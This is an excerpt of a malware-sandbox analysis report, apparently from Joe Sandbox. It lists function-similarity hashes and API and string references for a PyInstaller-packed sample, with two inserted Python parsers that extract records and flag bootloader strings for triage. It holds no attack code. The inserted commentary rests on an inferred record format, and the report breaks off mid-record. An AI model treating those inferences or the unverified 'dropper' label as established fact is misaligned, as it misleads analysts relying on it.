• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 8fc7f9ff4dde7e17aa57633597099d443c0721ac97b4d53e20ea711ddd69fa91
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: BA516436B18A5286EB258B2DD84463A37F0EB45BB8F244331DE4D97794CF3AE842C751

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: d9bf1ca30ee63974e36a2ba3e80b1e4f6d0e25e12eca10ae85ab9bc03ba0e8f8
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: F3516372B1865185EB658B2DC458A3A23B4EB55BB8F244331CE4D87798CF3AEC43C741

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction ID: d8d7760394b01fde185b7b79aa25ff9e01555080e313e4a421e3ab3b2af69041
• Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction Fuzzy Hash: 6D515277B1865186EB258B2DC84467A23F0EB44FB8F244231CA4D977A4DF3AE883C741

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: 6fbb7236a3f17b29e9ddc5e40902280dfc57df15dbf4977863611d15c26b9297
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: 20518A36B1465185EB268B1DC848A3A37B1EB54BA8F644231CE4D977ACCF3AEC43C741

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: ca3b0ca9b4ed94acc745680ceefef9c17d18bf39281cd4de416fd8722ec3991a
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: BC51B336B1865186EB268B2DDC40A7E23F1EB44BB8F654231CA4C97795CF3AEC42C741

Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: ca633a839528177b4354870e1207a16a2e50f3f1810b0bf941dbfbb3d5cfa9d5
• Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction Fuzzy Hash: 3E515236B1865586EF268B2DC844B3A27F1EB45BA8F244231CE4D97794CF3AE843C741
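The function records above are what an analyst would load into a function-similarity or YARA-tracking database to match this dropper against other PyInstaller-packed samples. What follows is an added example, not code from the Joe Sandbox report or from Joe Security's IDA plugin: a small Python parser that turns the "Memory Dump Source" / "Similarity" records into dicts, drops records the export cut short, pulls out the functions that reference a named API (on this page only `_invalid_parameter_noinfo`), and runs sanity checks before the identifiers are stored. The record layout is inferred from the text on this page; SAMPLE is an abridged re-typing of three records from above (the third deliberately truncated, as the page's last record is), and nothing about the internal format of Joe Sandbox's fuzzy hashes is assumed.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data.
Added example, not Joe Sandbox code; record layout inferred from this report.
SAMPLE is an abridged copy of three records from the page (third one truncated).
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
• Instruction ID: 71e26bd8f4d977f5ea8af51a0ad2767bf53bbaff76850ba6f309c1e2347d9673
• Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
• Instruction Fuzzy Hash: AA612622F1C2D286FFA5AB2CCC5463D66B0AF41778F158239DA1DC6AD5DE7DE8008702
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 8fc7f9ff4dde7e17aa57633597099d443c0721ac97b4d53e20ea711ddd69fa91
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: BA516436B18A5286EB258B2DD84463A37F0EB45BB8F244331DE4D97794CF3AE842C751
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID:
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$")
HEX64_RE = re.compile(r"^[0-9a-f]{64}$")
REQUIRED = ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")


def parse_records(text: str) -> List[Dict]:
    """One dict per function record; a record starts at 'Memory Dump Source'."""
    records: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {"Associated": []}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if current is None or not m:          # captions carry no data
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Associated":               # repeated field -> list
            current["Associated"].append(value)
        elif key == "Source File":
            sm = SOURCE_RE.match(value)
            if sm:
                current["Source File"] = sm.group("file")
                current["Offset"] = int(sm.group("offset"), 16)   # image base of the dump
                current["Based on PE"] = sm.group("pe") == "true"
            else:
                current["Source File"] = value
        else:
            current[key] = value              # empty string when the field is blank
    return records


def is_complete(rec: Dict) -> bool:
    """True when all four similarity identifiers are present."""
    return all(rec.get(k) for k in REQUIRED)


def api_references(records: List[Dict]) -> Dict[str, str]:
    """Opcode ID -> API ID for complete records that name an imported API."""
    return {r["Opcode ID"]: r["API ID"]
            for r in records if is_complete(r) and r.get("API ID")}


def consistency_issues(records: List[Dict]) -> List[Tuple[int, str]]:
    """Truncated records, IDs that are not 64 hex digits, and records where
    'Opcode Fuzzy Hash' differs from 'Opcode ID' (equal in every record on this page)."""
    issues = []
    for i, r in enumerate(records):
        if not is_complete(r):
            issues.append((i, "incomplete record"))
            continue
        for k in ("Opcode ID", "Instruction ID"):
            if not HEX64_RE.match(r[k]):
                issues.append((i, f"{k} is not 64 hex digits"))
        if r["Opcode Fuzzy Hash"] != r["Opcode ID"]:
            issues.append((i, "Opcode Fuzzy Hash differs from Opcode ID"))
    return issues


def duplicate_opcode_ids(records: List[Dict]) -> Dict[str, int]:
    """Opcode IDs that occur more than once (same function body listed twice)."""
    counts = Counter(r["Opcode ID"] for r in records if is_complete(r))
    return {k: n for k, n in counts.items() if n > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records, {sum(map(is_complete, recs))} complete")
    print("API references:", api_references(recs))
    print("issues:", consistency_issues(recs))
```

Run it against the full report text instead of SAMPLE to get every function of the dump; the incomplete-record check matters because a report copied out of the browser is often cut mid-record, exactly as at the end of this section.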
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75830
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75842
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75879
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7588B
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758A4
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758B6
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758CF
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758E1
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC758FD
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7590F
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7592B
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7593D
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75959
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC7596B
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75987
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC75999
• GetProcAddress.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759B5
• GetLastError.KERNEL32(?,00007FF62CC764BF,?,00007FF62CC7336E), ref: 00007FF62CC759C7
Strings
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: ed7a3963f2ba6b22fca9b8c813b45cef6a5515a54ceb7c2da60ea6be0e7f8730
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9622B374B49F47D2FE159B5DAD241B423B4EF04BB9B84A035C82E86360EF3CB55AD206
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC79400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62CC745E4,00000000,00007FF62CC71985), ref: 00007FF62CC79439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62CC788A7,?,?,00000000,00007FF62CC73CBB), ref: 00007FF62CC7821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC72810: MessageBoxW.USER32 ref: 00007FF62CC728EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction ID: 0cadc4fbb407535a8710761200dcf4f5c4df25f7aac95ae80efcbf4f528d89d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9351FB21B1CA4391FF50DB2DDC516BA2274EF947A4F444431D60EDA6D5EE3CE108D342
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: 6c7fad6209cea5350e32bb0fc0598bf4ab7a5edddb6f78182d8730f349e6e5cd
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: 7051E736604BA186DA349F26E8181BAB7B1FB98B75F004125EFDE83A94DF3CD045DB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction ID: 435f4a025f35b50c762097ba75f74c85a60dbf5e56131fa384c7f5d56b7105e0
• Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction Fuzzy Hash: 6A216D31B0CA4292EF558B7EAC641796274FF88FB4F489231DB2DC77A4DE2CD5958202
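The three records above (the GetProcAddress loop that reports "Failed to get address for %hs", the runtime-tmpdir handling that logs "LOADER: ..." errors, and the ShutdownBlockReasonCreate call with "Needs to remove its temporary files.") are the string signatures of the PyInstaller bootloader, which matches the "Found pyInstaller with non standard icon" signature in this report. The following is an added example, not Joe Sandbox or PyInstaller code: it parses the "• Key: value" Similarity records in the layout used on this page (strings of one function are joined with "$", the API String ID is two decimal hashes joined with "-"), flags the bootloader markers, and lists the Python C-API symbols the loader resolves by name from the bundled python DLL. The marker list is an assumption based on the well-known bootloader strings; the sample input is constructed from the records above with the long String ID list excerpted.

```python
"""Parse Joe Sandbox 'Similarity' records and flag PyInstaller bootloader
markers.  Added example, not Joe Sandbox or PyInstaller code."""
import re
from dataclasses import dataclass

# Assumption: strings the PyInstaller bootloader emits (pyi_python.c,
# pyi_utils.c and pyi_win32_utils.c in the bootloader sources).
PYINSTALLER_MARKERS = (
    "Failed to get address for %hs",
    "LOADER: failed to create runtime-tmpdir path %ls!",
    "Needs to remove its temporary files.",
)


@dataclass
class Record:
    api_id: str
    strings: list             # individual strings of the function
    api_string_id: tuple      # (api-hash, string-hash) as two ints
    opcode_id: str
    instruction_fuzzy_hash: str


def parse_record(block: str) -> Record:
    """Turn one group of '• Key: value' bullet lines into a Record."""
    fields = {}
    for line in block.splitlines():
        line = line.strip().lstrip("•").strip()
        if ":" not in line:
            continue
        key, _, value = line.partition(":")   # first colon ends the key
        fields[key.strip()] = value.strip()
    api_hash, _, str_hash = fields["API String ID"].partition("-")
    return Record(
        api_id=fields["API ID"],
        # The report joins a function's strings with '$'.
        strings=[s for s in fields.get("String ID", "").split("$") if s],
        api_string_id=(int(api_hash), int(str_hash)),
        opcode_id=fields["Opcode ID"],
        instruction_fuzzy_hash=fields["Instruction Fuzzy Hash"],
    )


def parse_report(text: str) -> list:
    """Records are separated by blank lines in the sample below."""
    blocks = re.split(r"\n\s*\n", text.strip())
    return [parse_record(b) for b in blocks if b.strip()]


def pyinstaller_markers(rec: Record) -> list:
    """Bootloader marker strings present in this function's string table."""
    return [m for m in PYINSTALLER_MARKERS if m in rec.strings]


def resolved_python_api(rec: Record) -> list:
    """Python C-API names the function looks up by string; the record that
    carries 'Failed to get address for %hs' resolves them with GetProcAddress
    from the bundled python DLL instead of importing them statically."""
    return sorted(s for s in rec.strings if s.startswith("Py"))


def classify(text: str) -> dict:
    """Map each record's opcode ID to the bootloader markers it carries."""
    return {r.opcode_id: pyinstaller_markers(r) for r in parse_report(text)}


# Constructed input: three records copied from the report above in its own
# '• Key: value' layout, with the first String ID list excerpted.
SAMPLE = """\
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_Read$PyEval_EvalCode$PyImport_ImportModule$PyMarshal_ReadObjectFromString$Py_InitializeFromConfig
• API String ID: 199729137-653951865
• Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
• Instruction Fuzzy Hash: 9622B374B49F47D2FE159B5DAD241B423B4EF04BB9B84A035C82E86360EF3CB55AD206

• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!
• API String ID: 1662231829-930877121
• Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
• Instruction Fuzzy Hash: 9351FB21B1CA4391FF50DB2DDC516BA2274EF947A4F444431D60EDA6D5EE3CE108D342

• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction Fuzzy Hash: 6A216D31B0CA4292EF558B7EAC641796274FF88FB4F489231DB2DC77A4DE2CD5958202
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.opcode_id[:16], pyinstaller_markers(rec), resolved_python_api(rec))
```

Matching on the fixed-format strings rather than on fuzzy hashes is deliberate: the Instruction Fuzzy Hash changes with compiler version and build options, while these message strings have been stable across PyInstaller releases, so they survive as a triage signal for any PyInstaller-packed sample, not just this one.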
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: e7633c3ae476d131e9bde0ae222727082b1c6dda4ae2e176291e8e5f095c2e3b
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 7E127361F0C14386FF267A18D955ABB76B1FB407B0F944235E69A876C8DF3CE5808B42
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 82c32ab55855f988ffdff2a29f76f49eb6b8ef0311011d8bdfedf900cb599c49
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: 24125461F0C18385FF269A19AC54A7B66F1EB807B4F984235D699C7BC4DF7CE4808B12
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
